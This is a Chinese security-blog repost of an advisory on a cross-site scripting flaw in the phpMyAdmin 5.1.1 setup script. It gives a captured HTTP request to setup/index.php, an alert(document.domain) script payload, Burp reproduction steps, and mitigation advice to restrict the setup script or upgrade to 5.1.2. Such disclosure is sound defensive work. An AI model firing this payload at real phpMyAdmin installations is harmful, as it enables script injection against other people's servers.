PhpMyAdmin 5.1.1 - XSS(跨站点脚本)

admin
admin
admin
102613
文章
87
评论
2023年5月15日08:44:45评论75 views字数 817阅读2分43秒阅读模式

描述:

已发现一系列弱点,可能允许攻击者将恶意代码注入设置脚本的各个方面,从而允许 XSS 或 HTML 注入。


GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=test  HTTP/1.1      Host: 127.0.0.1:1234       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8      Accept-Language: en-US,en;q=0.5     Connection: close   Cookie: pma_lang=en; phpMyAdmin=fs55xxxxxxx; pma_lang=en; pmaUser-1=xxxxxxxxxxxxxxxxxxxxxxxxxxx; phpMyAdmin=xxxxxxxxxxxxxxx; pmaAuth-1=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx           Upgrade-Insecure-Requests: 1          Cache-Control: max-age=0


有效载荷:

">'><script>alert(document.domain)</script>


重现步骤 :

  1. 在 burp 中捕获上面的 reuqest。

  2. 使用易受攻击的参数替换/更改 XSS 负载。

  3. 单击发送并在浏览器中显示响应。

  4. 你会得到弹出窗口!


PhpMyAdmin 5.1.1 - XSS(跨站点脚本)

缓解:

带有配置文件 config.inc.php 的 phpMyAdmin 安装将不允许访问安装脚本,从而减轻这种攻击。

升级到 phpMyAdmin 5.1.2 或更新版本或应用下面列出的补丁。


原文始发于微信公众号(Khan安全攻防实验室):PhpMyAdmin 5.1.1 - XSS(跨站点脚本)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月15日08:44:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PhpMyAdmin 5.1.1 - XSS(跨站点脚本)http://cn-sec.com/archives/1733375.html

发表评论

匿名网友 填写信息